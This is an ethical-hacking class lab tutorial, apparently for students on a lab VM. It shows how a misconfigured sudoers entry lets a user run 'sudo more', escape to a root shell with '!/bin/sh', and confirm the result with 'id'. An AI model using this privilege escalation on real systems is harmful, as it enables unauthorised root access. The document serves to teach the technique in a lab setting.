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(Ethical Hacking: sudo)

{ sudo more exploit}

Background Information
  • Background
    • If the /etc/sudoers file is misconfigured for a particular user, then that specific user can use sudo command to gain root access.


  1. Login to your TargetUbuntu01 VM, as username adminstrator
    • For those of you that do not have access to my class, the TargetUbuntu01 VM is a Linux Ubuntu Operating System.


Section 1: First we need to create an exploit file
  1. Command:  cp /etc/passwd hackme2.txt


  2. Command: sudo more hackme2.txt (See Below)
    • sudo allows a permitted user to execute a command as the superuser or another user, as specified in the sudoers file.


    • More is a filter for paging through text one screenful at a time..


    • hackme2.txt - is just a name of a file you are opening with the more command.  Note, the file hackme2.txt can be called anything.



  3. Press the return key.
    • Supply the administrator password if requested.


  4. You will see something similar.


  5. Now we will shell out of the more command.
    • Command: !/bin/sh


  6. Command:  id


Section 2: Exiting the root shell
  1. To exit out of the shell.
    • Command:  exit
    • Press the Enter Key a few times until you get a prompt.


Proof of Lab
  1. Command: grep sudo /var/log/auth.log | grep more | tail -1
    • Do a screen print similar to the picture below and paste picture into a word document.
    • Submit to moodle.

























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